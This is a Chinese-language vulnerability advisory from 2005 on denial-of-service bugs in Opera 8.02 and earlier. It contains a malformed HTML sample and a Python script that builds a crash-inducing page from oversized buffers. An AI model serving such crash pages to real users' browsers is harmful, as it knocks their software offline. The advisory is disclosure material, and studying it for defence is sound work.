发布日期：2005-10-18
更新日期：2005-10-18

受影响系统：

Opera Software Opera Web Browser <= 8.0 2

描述：

---

BUGTRAQ  ID: 15124

Opera是一款流行的WEB浏览器，支持多种平台。

Opera Web浏览器中存在多个拒绝服务漏洞。如果解析了某些畸形的HTML内容的话，就可能导致浏览器崩溃。

目前更多信息不详。

<*来源：posidron （posidron@tripbit.org）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

畸形的HTML：

<html><head></head><body><bdo>A<bgsound style="margin:-99;">A<hr>A<hr></body></html>

用于创建畸形HTML的python代码：

html = open("opera.html", "w")
html.write("<html style=\"content: url(0);\">\n")
html.write("<head></head>\n")
buff1 = 'A'*32499
html.write("<bodyA>\n"+buff1+"\n")
buff2 = 'B'*153
html.write("<u "+buff2+">\n")
html.write("</body></html>")
html.close()

建议：

---

厂商补丁：

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.opera.com

浏览次数：2445
严重程度：0（网友投票）